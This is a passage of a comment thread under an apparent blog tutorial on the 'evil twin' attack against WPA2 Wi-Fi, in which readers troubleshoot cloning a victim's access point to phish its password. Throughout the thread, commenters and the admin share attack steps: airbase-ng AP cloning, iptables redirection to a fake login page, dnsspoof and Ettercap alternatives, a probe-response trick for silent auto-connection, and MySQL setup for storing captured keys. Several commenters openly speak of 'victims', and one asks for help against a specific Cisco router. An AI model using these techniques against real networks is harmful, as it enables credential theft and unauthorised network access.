Expect it before end of the month! =)



matt (147 days)

I have the same problem arminaven, everything seems to be working ok, when i type

localhost in the attacker computer everything works great.When i try to connect to

the AP with the victems computer, its doesnt let me connect. ANybody got any




admin (127 days)

Hey matt!

After many comments and suggestions (almost 100 comments only on this page!),

and a lot of people having issues, I decided to make a script to automate this…

I know I’m not answering your specific question and I’m sorry.

Page 39: Hacking Wpa 2 Evil Twin Method

Hopefully it will help you understand it better once you see how the script works.

Expect it before end of the month! =)



NightCoder (145 days)


like arminaven says …me too in the computer victim i can connect to Fake AP

but i can’t see my page i see it just if i type my ip(

any help guys


admin (127 days)

Hey NightCoder!

After many comments and suggestions (almost 100 comments only on this page!),

and a lot of people having issues, I decided to make a script to automate this…

I know I’m not answering your specific question and I’m sorry.

Hopefully it will help you understand it better once you see how the script works.

Expect it before end of the month! =)



bud (127 days)

Hi admin.

I have read all the posts here but isn`t clear for me.

What i want to ask is this and if you time to help.

1. Victim AP is a Cisco modem router

2. do i need to find its ip address, and how ?

Page 40: Hacking Wpa 2 Evil Twin Method

3. how can i find its isp ?

4. Assuming that I founded all information required for this ap can you rewrite all the

comands with required adjustments using my actually ip of my ap which is

5. How can be compiled a different web page asking for wpa2 verify ? In this case we

need a fake Cisco web page, which its default ip founed on internet is (i pinged from my cmd.exe the ‘cisco.com’)


admin (127 days)

Hey bud!

2) IP address is not needed, since the victim is trapped inside evil twin network.

3) ISP isn’t needed per se… but it is good practice to save the victim BSSID… on a

MAC address it works like this [XX:XX:XX] the first 3 pairs represent the company…

so if you know the company it becomes easier to guess the ISP (only verizon uses

that router model for example)… the last 3 pairs represent model.

I’m gonna skip to this:

After many comments and suggestions (almost 100 comments only on this page!),

and a lot of people having issues, I decided to make a script to automate this…

I know I’m not answering your specific question and I’m sorry.

Hopefully it will help you understand it better once you see how the script works.

Expect it before end of the month! =)



vahid (126 days)


thanks for your nice work.

First of all, please accept my excuse for poor English writing .

Page 41: Hacking Wpa 2 Evil Twin Method

i wanted to share the following idea :

as we know every access point (ap) is broadcasting beacon . This beacon contains all

the information about that access point. when a station wants to join to a access

point it first sends probe request (although it can still silent and wait for the next

beacon). access points are designed to respond to probe request packet with a probe

respond. probe respond contains the same information as in the beacon. what we

can do is this : in the fake ap’s beacon copy exactly the same information as in victim

ap but at the probe respond reveal that the ap is open.

as you know, windows 7 and vista are designed such that at background they search

for the beacons and whenever they find an other access point with the identical

name and identical security configuration they try to atumaticaly connect to that and

as the first step they send probe request to the founded ap.

in this way they will be no need for deauth of clients and clients would not see the

alarm of connecting to an unsecured ap.


bud (124 days)

Hey admin.

I have runed the ifconfig and took;

root@root:~# ifconfig

lo Link encap:Local Loopback

inet addr: Mask:

inet6 addr: ::1/128 Scope:Host


RX packets:579 errors:0 dropped:0 overruns:0 frame:0

TX packets:579 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:71001 (71.0 KB) TX bytes:71001 (71.0 KB)

wlan0 Link encap:Ethernet HWaddr d8:5d:4c:90:5f:c2

inet addr: Bcast: Mask:

inet6 addr: fe80::da5d:4cff:fe90:5fc2/64 Scope:Link


RX packets:14006 errors:0 dropped:0 overruns:0 frame:0

TX packets:2940 errors:0 dropped:0 overruns:0 carrier:0

Page 42: Hacking Wpa 2 Evil Twin Method

collisions:0 txqueuelen:1000

RX bytes:4874931 (4.8 MB) TX bytes:314334

—WHICH CORRECTION COULD BE MADE IN -gedit /etc/dhcp3/dhcpd.conf-


ddns-update-style ad-hoc;

default-lease-time 600;

max-lease-time 7200;

subnet netmask {

option subnet-mask;

option broadcast-address;

option routers

option domain-name-servers;





cristy (120 days)

i think instead of install a dhcp3 server and set all parametres it’s easier to do a

dnsspoof on wireless interface, isn’t it??


sparta (117 days)

thnx for the tuto

i have one quetsion

can i do this with one wifi card

conect to the internet and cloning the ap and deathaunticate the client plz answer

with no damage to my wifi card


Page 43: Hacking Wpa 2 Evil Twin Method

Pete (114 days)


all this might be working I believe.

But when I create my “Twin” and start airodump I see my created AP but the channel

is constantly changing.Of course nobody can connect…

Though my command was like airbase-ng -e “APname” -c 1 -a C0:25:06:98:50:6E

mon0 so it should send only on ch1 but it doesnt.

Whats going wrong here?

greetz, pete


Jess (111 days)

hi !!!

great video . i have a problem . l did all the steps and the fake webpage appears ,

and i try to put password.

but the screen shows.

” Please try again… Can’t locate the db. ”

and after i start mysql

root@bt:~# mysql -u root -p

Enter password:

Welcome to the MySQL monitor.

Commands end with ; or \g.

Your MySQL connection id is 35

Server version: 5.1.41-3ubuntu12.10 (Ubuntu)


‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql> use wpa2;

Page 44: Hacking Wpa 2 Evil Twin Method

Reading table information for completion of table and column names

You can turn off

this feature to get a quicker startup with -A

Database changed

mysql> select * from content;

Empty set (0.00 sec)


i type the password but in nothin appears plz help me



Marcus (102 days)

This is great tutorial but could you tell me please do you need to be connected to the

internet in the first place in order to crack it. Is it possible to do that without being

connected to the net help me please.



John Nuber (93 days)

Hello and help

First I am familiar with this approach and the work of Douglas from weaknet labs as

he has produced a phishing program in his distro for WPA Enterprise which can be

adapted for WPA shared keys etc. All aspects of the weaknet labs program are


I have managed to get your program up and working. I can associate to the phoney

AP BUT I cannot get your web pages to show up in the targets computer when the

victim tries to surf the net. The pages do show up in my computer.

My Apache2 gives me a warning and then goes to and this does run up the

web pages in the /VAR/WWW/ folder in my computer.

Page 45: Hacking Wpa 2 Evil Twin Method

I am running two rtl8187 USOW36H recievers wlan0 and wlan1. wlan1 is assoicated

to another wifi reciever and has internet access. I have used both the IP of wlan1 and

the IP of the associated AP. I still cannot get the computer web pages to show up ihe

victims computer.

All other aspects of this approach as far as I could test work great!!


Matthieu (90 days)

Hi, Thank you very much for this post!!

I just have a problem with the traffic redirection, the command doesn’t work for me.

“iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination

iptables -t nat -A POSTROUTING -j MASQUERADE”

On the victim machine, I am suposed to be redirected on the Attack Page

(htp:// but I’m not.

Do you know where the problem come from?



Matthieu (85 days)

Hi Admin,

I found another way to do it, I used Ettercap-ng with the dns-spoofing plugin and

that worked very well

Thank you for the quality of your blog!!


Sangamesh (86 days)

Hi sir, I tried to follow all ur steps, but i’m stuck in checking mysql and apache

services. i typed “localhost” in the browser.. bit i got

“It works!

Page 46: Hacking Wpa 2 Evil Twin Method

This is the default web page for this server.

The web server software is running but no content has been added, yet.”.

I’m new to this BT5, so requesting u to help me out..

Thanks, good day:)


Asfand (77 days)


I applied all commands.. i got a problem. please help.

The victims router signals does not vanishes..

please help..

thanks in advance.


t.vanhuong (74 days)

can et0 is 2n’th wireless card?

Please feedback me!



Aroz (24 days)

Hello admin.

I am stuck at the last stage. I have done everything said and it works.

But at last when i use mysql. I get this:

ERROR 1146 (42S02) : Table “wpa2.content” doesn’t exist.


Page 47: Hacking Wpa 2 Evil Twin Method

Mukesh (13 days)

Hi, everyone. for those of you having problems with mySQL here are the commands

and be sure not to leave out the ‘;’ after each line.

Start my Sql server as normal.


Login to MySQL:

mysql -u root -p

Note: Default backtrack user/pass are root/toor

Create the database (type exactly as it is including’;')

create database wpa2;

use wpa2;

create table content(key1 VARCHAR(64), key2 VARCHAR(64));

other commands you should play with are:

show databases;

show tables;

INSERT into content values (’12345′,’12345′);

This command will list the content:

SELECT * from content;

I hope this helps.